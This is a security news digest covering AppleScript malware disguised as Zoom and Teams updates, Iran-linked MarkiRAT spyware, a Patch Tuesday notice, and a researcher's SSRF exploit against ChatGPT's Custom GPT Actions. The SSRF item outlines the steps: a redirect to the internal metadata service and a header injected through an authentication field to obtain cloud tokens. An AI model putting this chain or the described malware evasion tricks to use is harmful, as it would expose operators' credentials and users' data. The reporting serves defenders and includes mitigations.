AppleScript Malware Masquerades as Zoom and Teams Updates to Bypass macOS Defenses
Threat actors are increasingly exploiting AppleScript ([.]scpt) files to distribute macOS malware disguised as legitimate updates for applications, including Zoom and Microsoft Teams. Following Apple’s August 2024 removal of the Gatekeeper “right-click and open” override, attackers shifted toward this new delivery method to regain user execution success rates. The scripts—often embedded with malicious commands—are disguised as credible documents or update installers and rely on social engineering to convince users to open and manually run them in Script Editor, a legitimate macOS application. Once executed, these scripts can deploy credential stealers, including Odyssey Stealer or MacSync Stealer, exfiltrating sensitive user data under the guise of trusted software updates. The technique’s sophistication lies in custom icons and resource forks, which allow the scripts to appear as normal files when delivered in ZIP or DMG archives, evading visual detection and most antivirus scans. VirusTotal analyses confirm that many samples currently register zero detections, emphasizing the stealth of this approach. Security researchers have identified widespread phishing campaigns using fake Teams and Zoom SDK updates, as well as bogus financial documents, to deliver these payloads. Defenders should mitigate risk by changing the default application for .scpt files away from Script Editor and monitoring for obfuscated shell commands or AppleScript event codes. As this attack method continues to proliferate, it signals a growing adaptation of APT-grade macOS tradecraft in mainstream criminal operations.
Researcher Exploits SSRF in ChatGPT’s Custom GPT Actions to Access Azure Cloud Tokens
Researchers have found a server-side request forgery (SSRF) vulnerability in ChatGPT’s Custom GPTs “Actions” feature that allowed the service to follow user-supplied API endpoints and retrieve internal metadata. The researcher discovered the issue while configuring a custom GPT action and used an allowed HTTPS endpoint that redirected to the platform’s internal metadata service to bypass the feature’s HTTPS restriction. When the redirected request reached the metadata service, it initially failed because the service required a specific header; the researcher then exploited the feature’s authentication settings to inject that header by creating a custom authentication field with the required name and value. That sequence returned instance metadata and generated an access token tied to the hosting environment’s management API, allowing an attacker to query or provision cloud resources. The exploit chain required only a small number of creative steps, underscoring how an interaction of permissive redirects, header handling, and user-controlled API configuration can lead to high-impact credential exposure. The root weaknesses were permissive redirect handling, insufficient validation of user-supplied authentication fields, and overly permissive outbound request behavior from a feature designed for convenience. Recommended mitigations include strict validation and allow-listing of external endpoints, blocking or canonicalizing redirects that resolve to internal addresses, and disallowing header injection from user-provided authentication fields. Operators should also enforce stronger protections for cloud metadata services, adopt the most secure metadata service modes available, apply least-privilege to service identities, and rotate credentials if any exposure is suspected. Additional defensive measures are egress filtering, outbound request auditing, and explicit threat modelling for any feature that bridges user content with cloud APIs.
Ferocious Kitten APT Expands Surveillance with MarkiRAT Keylogging and Clipboard Theft
The Ferocious Kitten advanced persistent threat (APT) group, active since at least 2015 and linked to Iranian state interests, continues to conduct cyber-espionage campaigns against Persian-speaking dissidents and activists. The group leverages politically themed spear-phishing lures containing weaponized Microsoft Office documents embedded with malicious macros to deploy its custom malware, MarkiRAT. Once executed, MarkiRAT establishes persistence and begins extensive surveillance—recording keystrokes, clipboard content, screenshots, and stored credentials —while exfiltrating data over HTTP/HTTPS channels. Analysts from Picus Security noted that recent variants hijack legitimate apps like Telegram and Chrome, embedding the implant alongside them so that both the malware and the legitimate software run seamlessly, reducing suspicion among victims. MarkiRAT’s operators demonstrate strong defense evasion and collection tradecraft, including use of the Right-to-Left Override (RTLO) Unicode trick to disguise executable files as media content. The malware further targets credential stores, including KeePass and PGP key files, forcing users to re-enter passwords so they can be logged. It also performs system reconnaissance to detect security tools, including Kaspersky and Bitdefender. The campaign’s precision targeting and consistent infrastructure indicate a long-term focus on surveillance and information control. Ferocious Kitten remains one of Iran’s most persistent domestic monitoring threats, continuously refining its social engineering and malware deployment to maintain visibility into the communications of opposition figures and diaspora communities.
Patch Tuesday
Patch Tuesday – Microsoft has released its latest updates, addressing multiple security vulnerabilities across Windows, Microsoft Office, and other supported products. These updates include fixes for both critical and important severity issues that could allow remote code execution, privilege escalation, or information disclosure if left unpatched.
